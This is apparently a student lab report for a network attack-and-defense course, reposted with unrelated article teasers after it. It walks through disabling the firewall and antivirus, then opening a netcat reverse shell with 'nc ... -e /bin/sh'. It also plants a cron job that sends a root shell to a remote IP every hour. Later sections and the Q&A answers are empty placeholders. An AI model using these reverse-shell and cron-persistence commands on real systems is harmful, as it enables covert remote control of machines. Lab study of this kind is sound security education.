20232421 2025-2026-1 《网络与系统攻防技术》实验二实验报告

1.实践内容

1.1 实践目标

  • 使用netcat获取主机操作Shell,cron启动某项任务(任务自定)
  • 使用socat获取主机操作Shell, 任务计划启动
  • 使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell
  • 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
  • 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

1.2 问题回答

  • 例举你能想到的一个后门进入到你系统中的可能方式?

AAA

  • 例举你知道的后门如何启动起来(win及linux)的方式?

AAA

  • Meterpreter有哪些给你映像深刻的功能?

AAA

  • 如何发现自己有系统有没有被安装后门?

AAA

2.实践过程

2.1 使用netcat获取主机的Shell,后执行定时任务

2.1.1 实验准备

屏幕截图 2025-10-22 161333
由于直接下载netcat会被阻止,因此需要先关闭防火墙后下载。

  • 进入目录控制面板\所有控制面板项\Windows Defender 防火墙\自定义设置;关闭Windows Defender防火墙。
    屏幕截图 2025-10-22 161047
  • 进入官网地址(https://eternallybored.org/misc/netcat/)下载netcat1.11。
  • 下载之后发现仍被阻止,选择保留即可。
    屏幕截图 2025-10-22 161958
  • 记得关闭Windows主机的防病毒软件并退出杀毒软件,否则可执行文件会被直接删除。被删除可选择在保护历史记录中还原。
    屏幕截图 2025-10-22 163729

2.1.2 使用netcat获取主机操作Shell

  • 主机操作:执行命令ipconfig获取主机IP地址
    屏幕截图 2025-10-22 163810
  • 主机操作:进入netcat所在目录,并通过控制台指令./nc64.exe -l -p 2421对2421端口进行监听,结果显示LISTENING则说明端口违背占用且监听成功。
    屏幕截图 2025-10-22 163845
    屏幕截图 2025-10-22 163953

实验指导书中监听的端口为8888,但部分同学的监听端口为个人学号,此处只要保证选用端口处于LISTENING状态(未被占用)即可,故此处尝试使用个人学号端口2421

  • 虚拟机操作:执行命令nc 172.16.209.107 2421 -e /bin/sh,让虚拟机主动连接到IP为172.16.209.107的2421端口
    屏幕截图 2025-10-22 172301
    屏幕截图 2025-10-22 172316

2.1.3 启动定时任务

  • 输入命令crontab -e编辑crontab文件,设置指定任务
    屏幕截图 2025-10-22 175545
  • 选用方法2/usr/bin/vin.basic编辑cron表
    屏幕截图 2025-10-22 175604
  • 添加命令50 * * * * /bin/netcat 192.168.3.13 2409 -e /bin/sh后保存退出。
    屏幕截图 2025-10-22 175711

改命令创建后门,让系统当时间到达某小时的第50分钟都自动尝试将本机的Shell控制权连接到172.16.209.107这台机器上。

  • 查看后门文件:通过路径/var/spool/cron/crontabs,找到crontabs文件夹,用root身份打开,此root文件即是后门文件
    屏幕截图 2025-10-22 173423

2.1.4 修改定时任务

  • 获取shell(参照之前步骤)
  • 写入新任务,将原来定时任务的50分钟改为20分钟,并按照路径生成文件。
echo "20 * * * * echo "20232409" > /home/biyouchen/tempfile/20232409.txt" > /var/spool/cron/crontabs/root`
  • 输入命令crontab -l,确认修改结果
    屏幕截图 2025-10-22 174027

2.2 使用socat获取主机的Shell

2.3 使用MSF meterpreter生成后门

2.4 使用MSF meterpreter生成获取目标主机资源的后门,并尝试提权

2.5 使用MSF生成shellcode,获取反弹连接Shell

3.问题及解决方案

4.学习感悟、思考等

参考资料

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/943802.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

两两交换链表中的节点-leetcode

题目描述 给你一个链表,两两交换其中相邻的节点,并返回交换后链表的头节点。你必须在不修改节点内部的值的情况下完成本题(即,只能进行节点交换)。 示例 1:输入:head = [1,2,3,4] 输出:[2,1,4,3]示例 2: 输入…

算法第二章实践作业

1.随机选择数组中的一个元素作为基准值,将数组划分为三部分:小于基准值的元素(左子数组)、等于基准值的元素(中间部分)、大于基准值的元素(右子数组)。若左子数组的长度 ≥ k,则第 k小的元素一定在左子数组中…

解决homebrew下载报错问题

报错: Error: mysql-client@8.4: Failed to download resource "openssl@3.rb"Download failed: https://raw.githubusercontent.com/Homebrew/homebrew-core/5780e7787be0ee2813710acd974cd41d6b260860/Fo…

软考中级学习总结(5)

连接: (1)Theata连接:R 连接 S theata表示任意不等符 (2)等值连接:R连接S,要求属性相同 (3)自然连接:R连接S,要求R与S有一个/多个同名的属性 计算出RXS,选出其中R.A=S.A 的行 外连接: 1.左外连接(保左)…

软考中级学习总结(4)

知识产权 专利地域性:只在申请国领域内受保护 计算机软件著作权的主体:人 依据:《中华人民共和国著作权法》,《计算机软件保护条例》 计算机软件著作权客体:计算机程序以及有关文档 程序设计说明书 流程图 用户手…

docker: Error response from daemon: failed to set up container networking 解决办法

问题描述 docker: Error response from daemon: failed to set up container networking: failed to create endpoint yesplaymusic on network bridge: Unable to enable DIRECT ACCESS FILTERING - DROP rule: (ipta…

“化零为整”的智慧:内存池如何绕过系统调用和GC,构建性能的护城河

“化零为整”的智慧:内存池如何绕过系统调用和GC,构建性能的护城河内存池:精打细算的内存管家 在高性能系统(如网络服务器)的极致优化中,当处理器和I/O的瓶颈被逐一攻克后,内存管理便成为决定系统延迟和吞吐量的…

CSP-S36

10.2110.21 t1code嘻嘻 #include <bits/stdc++.h> #define ldb long double using namespace std; int x, y;signed main() {freopen("island.in", "r", stdin);freopen("island.out&q…

新学期每日总结(第13天)

今日 相较昨日 学习了布置数据库

解决一台hp probook 430G3笔记本无法实现win10关机网络唤醒

解决一台hp probook 430G3笔记本无法实现win10关机网络唤醒一台hp probook 430G3笔记本,bios已经设置网络唤醒到硬盘,并且网卡的设置也没什么问题,但关机之后网卡的灯不亮,用网络唤醒也不开机。 在惠普社区找到一篇…

P4765 [CERC2014] The Imp 解题笔记

原题链接 题面 商店里有 \(n\) 个魔术实体,每个实体都锁在一个特殊的魔术宝箱中。第 \(i\) 个宝箱(和其中的实体)的售价为 \(c_i\)个金币,而其中实体的价值相当于 \(v_i\) 个金币。 然而像你这样的凡人,只能安全地…

2025年工业三维扫描仪品牌实力榜:启源视觉稳居行业第一

摘要: 2025年,中国工业三维扫描仪领域迎来全面智能化转型。多家厂商推出AI计量级三维扫描解决方案,但在综合口碑、技术实力与客户满意度上,杭州启源视觉科技有限公司(INSVISION)以绝对优势领跑行业。本次榜单基于…

实验2 现代C++编程初体验

任务一:1 #pragma once2 3 #include <string>4 5 // 类T: 声明6 class T {7 // 对象属性、方法8 public:9 T(int x = 0, int y = 0); // 普通构造函数 10 T(const T &t); // 复制构造函数 11 …

GCM(Galois/Counter Mode) 认证加密算法实现

项目概述 根据NIST SP 800-38D标准实现 AES-GCM GHASH、IV 处理、计数器生成、认证标签 实现 外部引入 使用 PyCryptodome 提供的 AES 块加密 使用Python标准库hmac 使用os.urandom生成随机比特流(经查询是密码学安全…

10.13-10.19学习做题笔记

10.13 咕咕咕。 upd-10.18 补了一下[Ynoi2016]炸脖龙I。 显然是数据结构题Ynoi能不是吗。 看见这个幂塔,就可以想到拓展欧拉定理。发现\(a^p\equiv a^{\varphi(p)}\),而\(\begin{matrix}\underbrace{\varphi(\varphi(…

20232411 2025-2026-1 《网络与系统攻防技术》实验二实验报告

1.实验内容 掌握后门原理及免杀技术。 问题回答:例举你能想到的一个后门进入到你系统中的可能方式? 回答:同一网络的其他计算机遭到攻击,后门通过网络绕过防火墙进入到我系统中。 例举你知道的后门如何启动起来(wi…

Lampiao 靶场

nmap起手访问80页面访问1898有两个文件一个音频,一个图片 音频说了 tiagodirb目录枚举 dirb http://192.168.1.71:1898 扫描一下敏感信息生成字典 cewl http://192.168.1.71:1898/?q=node/1 -w lam.txt 爆破一下ssh h…

【学习笔记】slope-trick

[BalticOI 2004] Sequence (Day1) \(f_{i,x}\) 表示考虑前 \(i\) 个位置,当前放了 \(x\)。转移式如下: \[f_{i,x} = |a_i - x| + f_{i - 1,x} \]考虑建坐标系,有点 $(x,f_{i,x})。然后它就相当于给当前的函数加上个…